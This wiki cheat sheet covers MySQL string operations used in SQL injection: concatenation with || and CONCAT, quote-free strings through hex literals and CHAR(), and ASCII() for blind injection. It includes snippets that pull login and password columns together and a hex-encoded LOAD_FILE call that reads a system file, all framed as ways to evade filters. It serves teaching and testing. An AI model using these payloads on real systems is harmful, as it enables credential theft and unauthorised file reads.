====== Hacking - SQL Injection - MySQL - String Operations ======

String related operations can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.

===== String Concatenation =====

<code sql>
||

SELECT login || '-' || password FROM members
</code>

<WRAP info>
**NOTE:**  About MySQL **"||"**

If MySQL is running in ANSI mode it's going to work but otherwise MySQL accepts it as a `logical operator` and will return 0.

A better way to do it is using **CONCAT()** function in MySQL:

<code sql>
CONCAT(str1, str2, str3, ...) (M) 

/* Concatenate supplied strings. */
SELECT CONCAT(login, password) FROM members
</code>
</WRAP>

----

===== Strings without Quotes =====

These are some direct ways to using strings but it's always possible to use **CHAR()** to generate string without quotes.

<code sql>
0x457578 /* Hex Representation of string. */

SELECT 0x457578 /* This will be selected as string in MySQL.*/
</code>

In MySQL easy way to generate hex representations of strings use this; 

<code sql>
SELECT CONCAT('0x',HEX('c:\\boot.ini'))

SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) /* This will return 'KLM'. */
</code>

Hex based SQL Injection Samples

<code sql>
SELECT LOAD_FILE(0x633A5C626F6F742E696E69) /* This will show the content of c:\boot.ini */
</code>

----

===== String Modification & Related =====

Return ASCII character value of leftmost character.

<code sql>
ASCII()

SELECT ASCII('a')
</code>

A must have function for Blind SQL Injections. 

----

Convert an integer of ASCII. 

<code sql>
CHAR()

SELECT CHAR(64)
</code>